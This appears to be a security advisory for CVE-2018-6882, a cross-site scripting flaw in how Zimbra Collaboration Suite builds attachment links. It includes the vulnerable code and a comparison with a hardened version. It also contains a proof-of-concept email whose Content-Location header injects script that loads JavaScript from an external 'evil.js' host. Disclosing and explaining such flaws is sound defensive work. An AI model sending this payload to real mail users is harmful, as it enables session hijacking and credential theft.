| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2018-6882 | 27 Mar 2018 00:00 | – | attackerkb |
| The vulnerability of the ZmMailMsgView.getAttachmentLinkHtml() function in the Zimbra Collaboration Suite email management system allows a hacker to execute arbitrary code. | 15 Aug 2022 00:00 | – | bdu_fstec |
| CVE-2018-6882 | 4 Dec 2023 00:51 | – | circl |
| Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability | 19 Apr 2022 00:00 | – | cisa_kev |
| Zimbra Collaboration Suite Cross-Site Scripting Vulnerability | 29 Mar 2018 00:00 | – | cnvd |
| Zimbra Collaboration Suite Cross Site Scripting (CVE-2018-6882) | 23 May 2022 00:00 | – | checkpoint_advisories |
| CVE-2018-6882 | 27 Mar 2018 16:00 | – | cve |
| CVE-2018-6882 | 27 Mar 2018 16:00 | – | cvelist |
| Old Zimbra vulnerability used to target Ukrainian Government Organizations | 18 Apr 2022 13:31 | – | hivepro |
| Weekly Threat Digest: 11 – 17 April 2022 | 21 Apr 2022 04:59 | – | hivepro |
`------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Zimbra Collaboration Suite due to
the way it handles attachment links
------------------------------------------------------------------------
Stephan Kaag, January 2018
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting (XSS) vulnerability was found in Zimbra
Collaboration Suite (ZCS). This issue allows an attacker to perform a
wide variety of actions, such as performing arbitrary actions on the
victim's behalf or presenting a fake login screen to collect usernames
and passwords. In order to exploit this issue, the attacker has to lure
a victim into opening a specially crafted email in ZCS.
------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2018-6882
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7
- https://bugzilla.zimbra.com/show_bug.cgi?id=108786
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ZCS 8.7.11_GA_1854 (build
20170531151956). It is however likely that this issue is present in all
versions of ZCS from version 8.5.0 on.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Zimbra Collaboration Suite version 8.8.7.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html
If an email is opened that contains one or more attachments, a link ('<a>' tag) is created for each attachment. The code responsible for doing this is contained in the ZmMailMsgView.getAttachmentLinkHtml function.
ZmMailMsgView.getAttachmentLinkHtml =
function(params) {
    var html = [],
        i = 0;
    html[i++] = "<a class='AttLink' ";
    [..]
    var href = params.href || (params.jsHref && "javascript:;");
    html[i++] = href ? "href='" + href + "' " : "";
    [..]
    html[i++] = "'>" + AjxStringUtil.htmlEncode(params.text) + "</a>";
    return html.join("");
};
In the above code the value for params.href is taken directly from the Content-Location header in the message. No sanitization is performed, and the value in the header can be influenced by an attacker. As a result it is possible to inject arbitrary HTML or JavaScript in the '<a>'-tag.
To exploit this issue an attacker can send an email with a specially crafted Content-Location header to a victim user. When the victim opens this message the script code will be executed.
Proof of concept
The following proof of concept email can be used to demonstrate this issue. When opening this mail, a JavaScript file from an external location will be loaded in Zimbra.
---[snip]---
From: [email protected]
To: [email protected]
Subject: Re: My message
MIME-Version: 1.0
Date: Thu, 4 Jan 2018 14:25:25 +0100 (CET)
Content-Type: multipart/mixed;
boundary="----=_Part_112602234_144352703.1515072325170"
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; name=attachment.txt
Content-Disposition: attachment; filename=attachment.txt
Content-Transfer-Encoding: base64
Content-Location: http://foo.bar'></a><img src=a onerror=window.x=document.createElement('script');window.x.src='https://s3-eu-west-1.amazonaws.com/eviljs/evil.js';document.body.appendChild(window.x)><a href='
YXR0YWNobWVudAo=
------=_Part_112602234_144352703.1515072325170--
---[snip]---
`
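The root cause described under Details, as an added example that is not Zimbra's code and not the 8.8.7 patch: a link builder with the same shape as the excerpt next to a hardened variant that validates the scheme and attribute-encodes the header-derived value. The function names, the scheme allow-list and the sample Content-Location values are assumptions constructed for illustration.

```javascript
// Added illustration; not Zimbra's source and not the 8.8.7 patch.
// Encode the characters that can close a quoted attribute or open a tag.
function htmlAttrEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Same shape as the excerpt: href goes unencoded into a single-quoted attribute.
function attachmentLinkVulnerable(params) {
  const href = params.href || (params.jsHref && "javascript:;");
  return "<a class='AttLink' " + (href ? "href='" + href + "' " : "") +
    ">" + htmlAttrEncode(params.text) + "</a>";
}

// Assumption: only these schemes are legitimate for an attachment link.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "cid:"]);

// Returns an attribute-safe href, or null if the value is not an allowed absolute URL.
function safeHref(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return null; // unparsable, e.g. markup characters in the host part
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? htmlAttrEncode(raw) : null;
}

// Hardened variant: header-derived href is validated and encoded; the
// "javascript:;" placeholder is only ever the internal constant.
function attachmentLinkHardened(params) {
  const href = (params.href && safeHref(params.href)) ||
    (params.jsHref ? "javascript:;" : "");
  return "<a class='AttLink' " + (href ? "href='" + href + "' " : "") +
    ">" + htmlAttrEncode(params.text) + "</a>";
}

// Constructed Content-Location values (harmless marker instead of script).
const CRAFTED = "http://foo.bar'></a><b id=injected>x</b><a href='";
const QUOTED_PATH = "https://files.example/it's.txt";

console.log(attachmentLinkVulnerable({ href: CRAFTED, text: "attachment.txt" }));
console.log(attachmentLinkHardened({ href: CRAFTED, text: "attachment.txt" }));
console.log(attachmentLinkHardened({ href: QUOTED_PATH, text: "attachment.txt" }));
```

The first line printed shows the marker element escaping the `<a>` tag; the other two show the value either dropped or kept inside the attribute with the quote encoded.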